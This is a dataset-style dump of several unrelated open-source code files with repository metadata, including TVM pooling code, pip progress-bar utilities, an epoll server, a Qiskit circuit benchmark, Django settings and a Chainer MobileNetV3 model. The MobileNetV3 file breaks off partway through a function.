['val_seen', 'val_unseen']: ev = Evaluation([split]) score_summary, _ = ev.score(outfile % split) print('\n%s' % outfile) pp.pprint(score_summary) if __name__ == '__main__': eval_simple_agents() #eval_seq2seq()
[ "weituo.hao@gmail.com" ]
weituo.hao@gmail.com
5e388aaa8b1c889e2a5ad3e841a1666c7eaea2b3
74b12c96a73d464e3ca3241ae83a0b6fe984b913
/python/tvm/relay/backend/contrib/ethosu/tir/pooling.py
7fdebf05f068c8a5c0a9529650aaaf625625f4c4
[ "Apache-2.0", "BSD-3-Clause", "Zlib", "MIT", "LicenseRef-scancode-unknown-license-reference", "Unlicense", "BSD-2-Clause" ]
permissive
masahi/tvm
cf765bb892655f02135e1ce3afde88698f026483
c400f7e871214451b75f20f4879992becfe5e3a4
refs/heads/master
2023-08-22T20:46:25.795382
2022-04-13T08:47:10
2022-04-13T08:47:10
138,661,036
4
2
Apache-2.0
2021-09-03T20:35:19
2018-06-25T23:39:51
Python
UTF-8
Python
false
false
3,729
py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name, unused-argument """Extract information from the pooling operators in TIR.""" from typing import Dict, Tuple import tvm from .utils import get_outer_loops, get_op_attrs, get_loads, get_stores from .dma import get_ifm_params, get_ofm_params from .spec import SerialKernel, SerialActivation, SerialPooling def get_pooling_params( stmt: tvm.tir.AttrStmt, producers: Dict[tvm.tir.Var, tvm.tir.AttrStmt], consumers: Dict[tvm.tir.Var, tvm.tir.AttrStmt], ) -> Tuple[SerialPooling, tvm.tir.Var, tvm.tir.Var]: """Get the parameters necessary to construct a call_extern for a pooling. Parameters ---------- stmt : tvm.tir.AttrStmt The outermost attribute statement of a convolution loop nest. producers : Dict[tvm.tir.Var, tvm.tir.AttrStmt] A dictionary to associate pointers with the loop nest that produces their values. consumers : Dict[tvm.tir.Var, tvm.tir.AttrStmt] A dictionary to associate pointers with the loop nest that consumes their values. Returns ------- SerialPooling The parameters needed to construct a 2D convolution. output_pointer : tvm.tir.Var The output pointer of the convolution operation. replace_pointer : tvm.tir.Var The output pointer of the DMA write operation, which is to replace the convolution output pointer. is_allocator : bool Whether this operator allocates its output. """ attrs, body = get_op_attrs(stmt) _, _, _, _, _, inner = get_outer_loops(body, "NHWC") rh = inner rw = rh.body # loads = [output, input, LUT, LUT] loads = get_loads(rw.body) # stores = [output] stores = get_stores(rw.body) input_pointer = loads[1].buffer.data output_pointer = stores[0].buffer.data # Get feature map info serial_ifm, serial_padding = get_ifm_params(input_pointer, producers) serial_ofm, serial_block_config, replace_pointer, is_allocator = get_ofm_params( output_pointer, consumers, producers ) # Get kernel info serial_kernel = SerialKernel( width=int(rw.extent), height=int(rh.extent), stride_w=int(attrs["stride_w"]), stride_h=int(attrs["stride_h"]), dilation_w=1, dilation_h=1, ) # Get activation info serial_activation = SerialActivation( op=attrs["activation"], clip_min=attrs["clip_min"], clip_max=attrs["clip_max"] ) return ( SerialPooling( ifm=serial_ifm, ofm=serial_ofm, pooling_type=attrs["pooling_type"], pool_shape=serial_kernel, padding=serial_padding, activation=serial_activation, rounding_mode=attrs["rounding_mode"], upscale=attrs["upscale"], block_config=serial_block_config, ), output_pointer, replace_pointer, is_allocator, )
[ "noreply@github.com" ]
masahi.noreply@github.com
79e117c269dacbcef4971383833eb94557dd58d8
b48ca98425b9510d16623277a0761a33c00d028d
/SeatReservation-Version3.0/SeatReservation-master/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/utils/ui.py
f036ae7639247d194c377af4e8f5227175c154ff
[]
no_license
billgoo/WHULibSeatReservation
f74a01db19f51a2034772d932c59afd9f63c7753
5423ef7df253739ccf279365c1dec1ebfe7f2c4f
refs/heads/master
2020-04-02T07:18:33.174744
2018-12-23T15:26:15
2018-12-23T15:26:15
154,190,237
0
1
null
null
null
null
UTF-8
Python
false
false
11,872
py
import itertools import sys from signal import signal, SIGINT, default_int_handler import time import contextlib import logging from pip.compat import WINDOWS from pip.utils import format_size from pip.utils.logging import get_indentation from pip._vendor import six from pip._vendor.progress.bar import Bar, IncrementalBar from pip._vendor.progress.helpers import (WritelnMixin, HIDE_CURSOR, SHOW_CURSOR) from pip._vendor.progress.spinner import Spinner try: from pip._vendor import colorama # Lots of different errors can come from this, including SystemError and # ImportError. except Exception: colorama = None logger = logging.getLogger(__name__) def _select_progress_class(preferred, fallback): encoding = getattr(preferred.file, "encoding", None) # If we don't know what encoding this file is in, then we'll just assume # that it doesn't support unicode and use the ASCII bar. if not encoding: return fallback # Collect all of the possible characters we want to use with the preferred # bar. characters = [ getattr(preferred, "empty_fill", six.text_type()), getattr(preferred, "fill", six.text_type()), ] characters += list(getattr(preferred, "phases", [])) # Try to decode the characters we're using for the bar using the encoding # of the given file, if this works then we'll assume that we can use the # fancier bar and if not we'll fall back to the plaintext bar. try: six.text_type().join(characters).encode(encoding) except UnicodeEncodeError: return fallback else: return preferred _BaseBar = _select_progress_class(IncrementalBar, Bar) class InterruptibleMixin(object): """ Helper to ensure that self.finish() gets called on keyboard interrupt. This allows downloads to be interrupted without leaving temporary state (like hidden cursors) behind. This class is similar to the progress library's existing SigIntMixin helper, but as of version 1.2, that helper has the following problems: 1. It calls sys.exit(). 2. It discards the existing SIGINT handler completely. 3. It leaves its own handler in place even after an uninterrupted finish, which will have unexpected delayed effects if the user triggers an unrelated keyboard interrupt some time after a progress-displaying download has already completed, for example. """ def __init__(self, *args, **kwargs): """ Save the original SIGINT handler for later. """ super(InterruptibleMixin, self).__init__(*args, **kwargs) self.original_handler = signal(SIGINT, self.handle_sigint) # If signal() returns None, the previous handler was not installed from # Python, and we cannot restore it. This probably should not happen, # but if it does, we must restore something sensible instead, at least. # The least bad option should be Python's default SIGINT handler, which # just raises KeyboardInterrupt. if self.original_handler is None: self.original_handler = default_int_handler def finish(self): """ Restore the original SIGINT handler after finishing. This should happen regardless of whether the progress display finishes normally, or gets interrupted. """ super(InterruptibleMixin, self).finish() signal(SIGINT, self.original_handler) def handle_sigint(self, signum, frame): """ Call self.finish() before delegating to the original SIGINT handler. This handler should only be in place while the progress display is active. """ self.finish() self.original_handler(signum, frame) class DownloadProgressMixin(object): def __init__(self, *args, **kwargs): super(DownloadProgressMixin, self).__init__(*args, **kwargs) self.message = (" " * (get_indentation() + 2)) + self.message @property def downloaded(self): return format_size(self.index) @property def download_speed(self): # Avoid zero division errors... if self.avg == 0.0: return "..." return format_size(1 / self.avg) + "/s" @property def pretty_eta(self): if self.eta: return "eta %s" % self.eta_td return "" def iter(self, it, n=1): for x in it: yield x self.next(n) self.finish() class WindowsMixin(object): def __init__(self, *args, **kwargs): # The Windows terminal does not support the hide/show cursor ANSI codes # even with colorama. So we'll ensure that hide_cursor is False on # Windows. # This call neds to go before the super() call, so that hide_cursor # is set in time. The base progress bar class writes the "hide cursor" # code to the terminal in its init, so if we don't set this soon # enough, we get a "hide" with no corresponding "show"... if WINDOWS and self.hide_cursor: self.hide_cursor = False super(WindowsMixin, self).__init__(*args, **kwargs) # Check if we are running on Windows and we have the colorama module, # if we do then wrap our file with it. if WINDOWS and colorama: self.file = colorama.AnsiToWin32(self.file) # The progress code expects to be able to call self.file.isatty() # but the colorama.AnsiToWin32() object doesn't have that, so we'll # add it. self.file.isatty = lambda: self.file.wrapped.isatty() # The progress code expects to be able to call self.file.flush() # but the colorama.AnsiToWin32() object doesn't have that, so we'll # add it. self.file.flush = lambda: self.file.wrapped.flush() class DownloadProgressBar(WindowsMixin, InterruptibleMixin, DownloadProgressMixin, _BaseBar): file = sys.stdout message = "%(percent)d%%" suffix = "%(downloaded)s %(download_speed)s %(pretty_eta)s" class DownloadProgressSpinner(WindowsMixin, InterruptibleMixin, DownloadProgressMixin, WritelnMixin, Spinner): file = sys.stdout suffix = "%(downloaded)s %(download_speed)s" def next_phase(self): if not hasattr(self, "_phaser"): self._phaser = itertools.cycle(self.phases) return next(self._phaser) def update(self): message = self.message % self phase = self.next_phase() suffix = self.suffix % self line = ''.join([ message, " " if message else "", phase, " " if suffix else "", suffix, ]) self.writeln(line) ################################################################ # Generic "something is happening" spinners # # We don't even try using progress.spinner.Spinner here because it's actually # simpler to reimplement from scratch than to coerce their code into doing # what we need. ################################################################ @contextlib.contextmanager def hidden_cursor(file): # The Windows terminal does not support the hide/show cursor ANSI codes, # even via colorama. So don't even try. if WINDOWS: yield # We don't want to clutter the output with control characters if we're # writing to a file, or if the user is running with --quiet. # See https://github.com/pypa/pip/issues/3418 elif not file.isatty() or logger.getEffectiveLevel() > logging.INFO: yield else: file.write(HIDE_CURSOR) try: yield finally: file.write(SHOW_CURSOR) class RateLimiter(object): def __init__(self, min_update_interval_seconds): self._min_update_interval_seconds = min_update_interval_seconds self._last_update = 0 def ready(self): now = time.time() delta = now - self._last_update return delta >= self._min_update_interval_seconds def reset(self): self._last_update = time.time() class InteractiveSpinner(object): def __init__(self, message, file=None, spin_chars="-\\|/", # Empirically, 8 updates/second looks nice min_update_interval_seconds=0.125): self._message = message if file is None: file = sys.stdout self._file = file self._rate_limiter = RateLimiter(min_update_interval_seconds) self._finished = False self._spin_cycle = itertools.cycle(spin_chars) self._file.write(" " * get_indentation() + self._message + " ... ") self._width = 0 def _write(self, status): assert not self._finished # Erase what we wrote before by backspacing to the beginning, writing # spaces to overwrite the old text, and then backspacing again backup = "\b" * self._width self._file.write(backup + " " * self._width + backup) # Now we have a blank slate to add our status self._file.write(status) self._width = len(status) self._file.flush() self._rate_limiter.reset() def spin(self): if self._finished: return if not self._rate_limiter.ready(): return self._write(next(self._spin_cycle)) def finish(self, final_status): if self._finished: return self._write(final_status) self._file.write("\n") self._file.flush() self._finished = True # Used for dumb terminals, non-interactive installs (no tty), etc. # We still print updates occasionally (once every 60 seconds by default) to # act as a keep-alive for systems like Travis-CI that take lack-of-output as # an indication that a task has frozen. class NonInteractiveSpinner(object): def __init__(self, message, min_update_interval_seconds=60): self._message = message self._finished = False self._rate_limiter = RateLimiter(min_update_interval_seconds) self._update("started") def _update(self, status): assert not self._finished self._rate_limiter.reset() logger.info("%s: %s", self._message, status) def spin(self): if self._finished: return if not self._rate_limiter.ready(): return self._update("still running...") def finish(self, final_status): if self._finished: return self._update("finished with status '%s'" % (final_status,)) self._finished = True @contextlib.contextmanager def open_spinner(message): # Interactive spinner goes directly to sys.stdout rather than being routed # through the logging system, but it acts like it has level INFO, # i.e. it's only displayed if we're at level INFO or better. # Non-interactive spinner goes through the logging system, so it is always # in sync with logging configuration. if sys.stdout.isatty() and logger.getEffectiveLevel() <= logging.INFO: spinner = InteractiveSpinner(message) else: spinner = NonInteractiveSpinner(message) try: with hidden_cursor(sys.stdout): yield spinner except KeyboardInterrupt: spinner.finish("canceled") raise except Exception: spinner.finish("error") raise else: spinner.finish("done")
[ "noreply@github.com" ]
billgoo.noreply@github.com
9042bc2e7dfed5812249fb189fa1277d8d1c2be2
8f26514c451e2398d5e3688c184ea74d1dad21b2
/month_02/teacher/day16/epoll_server.py
d519fab12014a4ac0890707f142243e5f1733a11
[]
no_license
CircularWorld/Python_exercise
25e7aebe45b4d2ee4e3e3afded082c56483117de
96d4d9c5c626f418803f44584c5350b7ce514368
refs/heads/master
2022-11-21T07:29:39.054971
2020-07-20T10:12:24
2020-07-20T10:12:24
281,081,559
0
1
null
null
null
null
UTF-8
Python
false
false
1,421
py
""" 基于epoll方法实现IO并发 重点代码 ! """ from socket import * from select import * # 全局变量 HOST = "0.0.0.0" PORT = 8889 ADDR = (HOST,PORT) # 创建tcp套接字 tcp_socket = socket() tcp_socket.bind(ADDR) tcp_socket.listen(5) # 设置为非阻塞 tcp_socket.setblocking(False) p = epoll() # 建立epoll对象 p.register(tcp_socket,EPOLLIN) # 初始监听对象 # 准备工作,建立文件描述符 和 IO对象对应的字典 时刻与register的IO一致 map = {tcp_socket.fileno():tcp_socket} # 循环监听 while True: # 对关注的IO进行监控 events = p.poll() # events--> [(fileno,event),()....] for fd,event in events: # 分情况讨论 if fd == tcp_socket.fileno(): # 处理客户端连接 connfd, addr = map[fd].accept() print("Connect from", addr) connfd.setblocking(False) # 设置非阻塞 p.register(connfd,EPOLLIN|EPOLLERR) # 添加到监控 map[connfd.fileno()] = connfd # 同时维护字典 elif event == EPOLLIN: # 收消息 data = map[fd].recv(1024) if not data: # 客户端退出 p.unregister(fd) # 移除关注 map[fd].close() del map[fd] # 从字典也移除 continue print(data.decode()) map[fd].send(b'OK')
[ "jiayuhaowork@163.com" ]
jiayuhaowork@163.com
6ab5b5216d0eb2a8650fcd1a62bcbabf049f5313
bf99b1b14e9ca1ad40645a7423f23ef32f4a62e6
/AtCoder/abc/089c_2.py
94da387294f84700a87543a31909ed7bb1b5e285
[]
no_license
y-oksaku/Competitive-Programming
3f9c1953956d1d1dfbf46d5a87b56550ff3ab3db
a3ff52f538329bed034d3008e051f30442aaadae
refs/heads/master
2021-06-11T16:14:12.635947
2021-05-04T08:18:35
2021-05-04T08:18:35
188,639,647
0
0
null
null
null
null
UTF-8
Python
false
false
344
py
from itertools import combinations from collections import defaultdict import sys input = sys.stdin.readline N = int(input()) cnt = defaultdict(int) for _ in range(N): s = input() cnt[s[0]] += 1 ans = 0 for h in combinations(['M', 'A', 'R', 'C', 'H'], r=3): prd = 1 for s in h: prd *= cnt[s] ans += prd print(ans)
[ "y.oksaku@stu.kanazawa-u.ac.jp" ]
y.oksaku@stu.kanazawa-u.ac.jp
9515c0bdd85d803050097e6ea7dac81417d8aa7d
09e57dd1374713f06b70d7b37a580130d9bbab0d
/benchmark/startQiskit_QC2883.py
3831cd0f21334b15907eb8542ea5d15be806d7d0
[ "BSD-3-Clause" ]
permissive
UCLA-SEAL/QDiff
ad53650034897abb5941e74539e3aee8edb600ab
d968cbc47fe926b7f88b4adf10490f1edd6f8819
refs/heads/main
2023-08-05T04:52:24.961998
2021-09-19T02:56:16
2021-09-19T02:56:16
405,159,939
2
0
null
null
null
null
UTF-8
Python
false
false
4,471
py
# qubit number=4 # total number=40 import cirq import qiskit from qiskit import IBMQ from qiskit.providers.ibmq import least_busy from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister from qiskit import BasicAer, execute, transpile from pprint import pprint from qiskit.test.mock import FakeVigo from math import log2 import numpy as np import networkx as nx def bitwise_xor(s: str, t: str) -> str: length = len(s) res = [] for i in range(length): res.append(str(int(s[i]) ^ int(t[i]))) return ''.join(res[::-1]) def bitwise_dot(s: str, t: str) -> str: length = len(s) res = 0 for i in range(length): res += int(s[i]) * int(t[i]) return str(res % 2) def build_oracle(n: int, f) -> QuantumCircuit: # implement the oracle O_f # NOTE: use multi_control_toffoli_gate ('noancilla' mode) # https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html # https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates # https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate controls = QuantumRegister(n, "ofc") target = QuantumRegister(1, "oft") oracle = QuantumCircuit(controls, target, name="Of") for i in range(2 ** n): rep = np.binary_repr(i, n) if f(rep) == "1": for j in range(n): if rep[j] == "0": oracle.x(controls[j]) oracle.mct(controls, target[0], None, mode='noancilla') for j in range(n): if rep[j] == "0": oracle.x(controls[j]) # oracle.barrier() return oracle def make_circuit(n:int,f) -> QuantumCircuit: # circuit begin input_qubit = QuantumRegister(n,"qc") classical = ClassicalRegister(n, "qm") prog = QuantumCircuit(input_qubit, classical) prog.h(input_qubit[3]) # number=20 prog.cz(input_qubit[0],input_qubit[3]) # number=21 prog.h(input_qubit[3]) # number=22 prog.x(input_qubit[3]) # number=13 prog.h(input_qubit[3]) # number=23 prog.cz(input_qubit[0],input_qubit[3]) # number=24 prog.h(input_qubit[3]) # number=25 prog.h(input_qubit[1]) # number=2 prog.h(input_qubit[2]) # number=3 prog.h(input_qubit[3]) # number=4 prog.h(input_qubit[0]) # number=5 prog.y(input_qubit[2]) # number=18 prog.cx(input_qubit[3],input_qubit[0]) # number=37 prog.z(input_qubit[3]) # number=38 prog.cx(input_qubit[3],input_qubit[0]) # number=39 oracle = build_oracle(n-1, f) prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]]) prog.h(input_qubit[1]) # number=6 prog.h(input_qubit[2]) # number=7 prog.h(input_qubit[3]) # number=8 prog.h(input_qubit[0]) # number=9 prog.h(input_qubit[0]) # number=33 prog.cz(input_qubit[2],input_qubit[0]) # number=34 prog.h(input_qubit[0]) # number=35 prog.h(input_qubit[1]) # number=19 prog.h(input_qubit[0]) # number=15 prog.cz(input_qubit[2],input_qubit[0]) # number=16 prog.h(input_qubit[0]) # number=17 prog.rx(1.6838936623241292,input_qubit[2]) # number=36 prog.y(input_qubit[1]) # number=26 prog.y(input_qubit[1]) # number=27 prog.swap(input_qubit[1],input_qubit[0]) # number=29 prog.swap(input_qubit[1],input_qubit[0]) # number=30 prog.x(input_qubit[0]) # number=31 prog.x(input_qubit[0]) # number=32 # circuit end for i in range(n): prog.measure(input_qubit[i], classical[i]) return prog if __name__ == '__main__': a = "111" b = "0" f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b) prog = make_circuit(4,f) IBMQ.load_account() provider = IBMQ.get_provider(hub='ibm-q') provider.backends() backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True)) sample_shot =8000 info = execute(prog, backend=backend, shots=sample_shot).result().get_counts() backend = FakeVigo() circuit1 = transpile(prog,backend,optimization_level=2) writefile = open("../data/startQiskit_QC2883.csv","w") print(info,file=writefile) print("results end", file=writefile) print(circuit1.__len__(),file=writefile) print(circuit1,file=writefile) writefile.close()
[ "wangjiyuan123@yeah.net" ]
wangjiyuan123@yeah.net
fc65a08e5902987c77d2744f2246f2ddbcaabf20
2ce27b05f45cef6ce3ae5c02b8e83e548def2fc6
/ADVANCE/Functions/Built in Function/reversed( ).py
dee1fad79a5a200d090d2edf08814e238497790f
[]
no_license
Ajay2521/Python
775b7d99736e83e4d0c37302b91d1413dd2c0d3b
a426dd7717de8a5e60e584d208ae7120bb84c1b3
refs/heads/master
2022-12-01T17:49:12.672061
2020-08-15T14:55:12
2020-08-15T14:55:12
273,632,074
1
0
null
null
null
null
UTF-8
Python
false
false
957
py
# In this lets see about the "Built-in functions" in python. # Built-in function is defined as the functions whose functionality is pre-defined in the python compiler. # Lets see about "reversed( ) bilt-in function" in python. # reversed( ) - Used to returns the reversed iterator of the given sequence. # Here is the program for reversed( ). String = "MaayoN" List = [ 1, 2, 3, 4, 5 ] Tuple = ( 1, 2, 3, 4, 5 ) print( ) # prints empty line for readability. print( reversed( String ) ) print ( list( reversed( String ) ) ) # Converting reversed value into List for readability. print( ) # prints empty line for readability. print( reversed( List ) ) print ( list( reversed( List ) ) ) # Converting reversed value into List for readability. print( ) # prints empty line for readability. print( reversed( Tuple ) ) print ( list( reversed( Tuple ) ) ) # Converting reversed value into List for readability.
[ "noreply@github.com" ]
Ajay2521.noreply@github.com
2f7fe328ac611be8426399a64197dce120f4b2ec
978e8e7397237a269ce55dff551aee65948d3803
/trading/settings.py
5f9f8f43ae749e67986d13bd7fa39f95cfc9ae2c
[]
no_license
AlexsandroMO/Bitcoin
cca28beeb712b63f31c7ef1c54aced47d8de3153
e19498660d5e3a9fdaee7fdb17e9a5464ebdac8d
refs/heads/master
2020-09-26T02:47:41.616660
2019-12-05T16:48:48
2019-12-05T16:48:48
226,146,249
0
0
null
null
null
null
UTF-8
Python
false
false
2,176
py
import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SECRET_KEY = '#v!6idcn2=1^#6s_2x=v*r7ru(^ktkf@rz8#w)jk(_l!po4!yv' DEBUG = True ALLOWED_HOSTS = [] INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'coin', 'crispy_forms', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'trading.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'trading.wsgi.application' DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True STATIC_URL = '/static/' CRISPY_TEMPLATE_PACK = 'bootstrap4' MEDIA_URL = '/media/' MEDIA_ROOT = 'media_files'
[ "sandrobass@hotmail.com" ]
sandrobass@hotmail.com
15c9a8ad3e8f75753d97ea1fff7da9f2912bb9ec
5387c60df3941243b869547e67eebf2b4bf899e4
/restfullmusiccrud/manage.py
de3f5d6c490f265ac2a7ee428fe76d12b0efc9d5
[ "Apache-2.0" ]
permissive
v22kumar/MyTestexcs
9148a433368b9081c0da23ae35f5da16bf6e33c0
392cf8220fa86349f29d1550dfd514dd99b304c8
refs/heads/master
2021-04-12T20:01:48.829192
2020-04-08T06:59:07
2020-04-08T06:59:07
249,106,065
0
0
null
null
null
null
UTF-8
Python
false
false
549
py
#!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "restfullmusiccrud.settings") try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv)
[ "you@example.com" ]
you@example.com
2e1b85709112fd757467515b49f272c9a5c81781
c7cc93a740664b907e1aec01f908b2aff3e8280c
/chainer_/chainercv2/models/mobilenetv3.py
42fbc2ddeb9c7746290924ef4abe19500e1eb822
[ "MIT" ]
permissive
avinash-chouhan/imgclsmob
9f2e46c9fd4fc0bb542de27e2ae4b9fc347964cc
ff46766065ea7846f8b36701451afc2bf6d667d3
refs/heads/master
2020-06-01T20:56:55.259224
2019-06-08T10:53:51
2019-06-08T10:53:51
null
0
0
null
null
null
null
UTF-8
Python
false
false
18,808
py
""" MobileNetV2, implemented in Chainer. Original paper: 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. """ __all__ = ['MobileNetV3', 'mobilenetv3_small_w7d20', 'mobilenetv3_small_wd2', 'mobilenetv3_small_w3d4', 'mobilenetv3_small_w1', 'mobilenetv3_small_w5d4', 'mobilenetv3_large_w7d20', 'mobilenetv3_large_wd2', 'mobilenetv3_large_w3d4', 'mobilenetv3_large_w1', 'mobilenetv3_large_w5d4'] import os import chainer.functions as F from chainer import Chain from functools import partial from chainer.serializers import load_npz from .common import conv1x1, conv1x1_block, conv3x3_block, dwconv3x3_block, dwconv5x5_block, SEBlock, HSwish,\ SimpleSequential class MobileNetV3Unit(Chain): """ MobileNetV3 unit. Parameters: ---------- in_channels : int Number of input channels. out_channels : int Number of output channels. exp_channels : int Number of middle (expanded) channels. stride : int or tuple/list of 2 int Stride of the second convolution layer. use_kernel3 : bool Whether to use 3x3 (instead of 5x5) kernel. activation : str Activation function or name of activation function. use_se : bool Whether to use SE-module. """ def __init__(self, in_channels, out_channels, exp_channels, stride, use_kernel3, activation, use_se): super(MobileNetV3Unit, self).__init__() self.residual = (in_channels == out_channels) and (stride == 1) self.use_se = use_se mid_channels = exp_channels with self.init_scope(): self.conv1 = conv1x1_block( in_channels=in_channels, out_channels=mid_channels, activation=activation) if use_kernel3: self.conv2 = dwconv3x3_block( in_channels=mid_channels, out_channels=mid_channels, stride=stride, activation=activation) else: self.conv2 = dwconv5x5_block( in_channels=mid_channels, out_channels=mid_channels, stride=stride, activation=activation) if self.use_se: self.se = SEBlock( channels=mid_channels, reduction=4, approx_sigmoid=True) self.conv3 = conv1x1_block( in_channels=mid_channels, out_channels=out_channels, activation=None, activate=False) def __call__(self, x): if self.residual: identity = x x = self.conv1(x) x = self.conv2(x) if self.use_se: x = self.se(x) x = self.conv3(x) if self.residual: x = x + identity return x class MobileNetV3FinalBlock(Chain): """ MobileNetV3 final block. Parameters: ---------- in_channels : int Number of input channels. out_channels : int Number of output channels. use_se : bool Whether to use SE-module. """ def __init__(self, in_channels, out_channels, use_se): super(MobileNetV3FinalBlock, self).__init__() self.use_se = use_se with self.init_scope(): self.conv = conv1x1_block( in_channels=in_channels, out_channels=out_channels, activation="hswish") if self.use_se: self.se = SEBlock( channels=out_channels, reduction=4, approx_sigmoid=True) def __call__(self, x): x = self.conv(x) if self.use_se: x = self.se(x) return x class MobileNetV3Classifier(Chain): """ MobileNetV3 classifier. Parameters: ---------- in_channels : int Number of input channels. out_channels : int Number of output channels. mid_channels : int Number of middle channels. """ def __init__(self, in_channels, out_channels, mid_channels): super(MobileNetV3Classifier, self).__init__() with self.init_scope(): self.conv1 = conv1x1( in_channels=in_channels, out_channels=mid_channels) self.activ = HSwish() self.conv2 = conv1x1( in_channels=mid_channels, out_channels=out_channels) def __call__(self, x): x = self.conv1(x) x = self.activ(x) x = self.conv2(x) return x class MobileNetV3(Chain): """ MobileNetV2 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- channels : list of list of int Number of output channels for each unit. exp_channels : list of list of int Number of middle (expanded) channels for each unit. init_block_channels : int Number of output channels for the initial unit. final_block_channels : int Number of output channels for the final block of the feature extractor. classifier_mid_channels : int Number of middle channels for classifier. kernels3 : list of list of int/bool Using 3x3 (instead of 5x5) kernel for each unit. use_relu : list of list of int/bool Using ReLU activation flag for each unit. use_se : list of list of int/bool Using SE-block flag for each unit. first_stride : bool Whether to use stride for the first stage. final_use_se : bool Whether to use SE-module in the final block. in_channels : int, default 3 Number of input channels. in_size : tuple of two ints, default (224, 224) Spatial size of the expected input image. classes : int, default 1000 Number of classification classes. """ def __init__(self, channels, exp_channels, init_block_channels, final_block_channels, classifier_mid_channels, kernels3, use_relu, use_se, first_stride, final_use_se, in_channels=3, in_size=(224, 224), classes=1000): super(MobileNetV3, self).__init__() self.in_size = in_size self.classes = classes with self.init_scope(): self.features = SimpleSequential() with self.features.init_scope(): setattr(self.features, "init_block", conv3x3_block( in_channels=in_channels, out_channels=init_block_channels, stride=2, activation="hswish")) in_channels = init_block_channels for i, channels_per_stage in enumerate(channels): stage = SimpleSequential() with stage.init_scope(): for j, out_channels in enumerate(channels_per_stage): exp_channels_ij = exp_channels[i][j] stride = 2 if (j == 0) and ((i != 0) or first_stride) else 1 use_kernel3 = kernels3[i][j] == 1 activation = "relu" if use_relu[i][j] == 1 else "hswish" use_se_flag = use_se[i][j] == 1 setattr(stage, "unit{}".format(j + 1), MobileNetV3Unit( in_channels=in_channels, out_channels=out_channels, exp_channels=exp_channels_ij, use_kernel3=use_kernel3, stride=stride, activation=activation, use_se=use_se_flag)) in_channels = out_channels setattr(self.features, "stage{}".format(i + 1), stage) setattr(self.features, 'final_block', MobileNetV3FinalBlock( in_channels=in_channels, out_channels=final_block_channels, use_se=final_use_se)) in_channels = final_block_channels setattr(self.features, 'final_pool', partial( F.average_pooling_2d, ksize=7, stride=1)) self.output = SimpleSequential() with self.output.init_scope(): setattr(self.output, 'final_conv', MobileNetV3Classifier( in_channels=in_channels, out_channels=classes, mid_channels=classifier_mid_channels)) setattr(self.output, 'final_flatten', partial( F.reshape, shape=(-1, classes))) def __call__(self, x): x = self.features(x) x = self.output(x) return x def get_mobilenetv3(version, width_scale, model_name=None, pretrained=False, root=os.path.join("~", ".chainer", "models"), **kwargs): """ Create MobileNetV3 model with specific parameters. Parameters: ---------- version : str Version of MobileNetV3 ('small' or 'large'). width_scale : float Scale factor for width of layers. model_name : str or None, default None Model name for loading pretrained model. pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ if version == "small": init_block_channels = 16 channels = [[16], [24, 24], [40, 40, 40, 48, 48], [96, 96, 96]] exp_channels = [[16], [72, 88], [96, 240, 240, 120, 144], [288, 576, 576]] kernels3 = [[1], [1, 1], [0, 0, 0, 0, 0], [0, 0, 0]] use_relu = [[1], [1, 1], [0, 0, 0, 0, 0], [0, 0, 0]] use_se = [[1], [0, 0], [1, 1, 1, 1, 1], [1, 1, 1]] first_stride = True final_use_se = True final_block_channels = 576 elif version == "large": init_block_channels = 16 channels = [[16], [24, 24], [40, 40, 40], [80, 80, 80, 80, 112, 112], [160, 160, 160]] 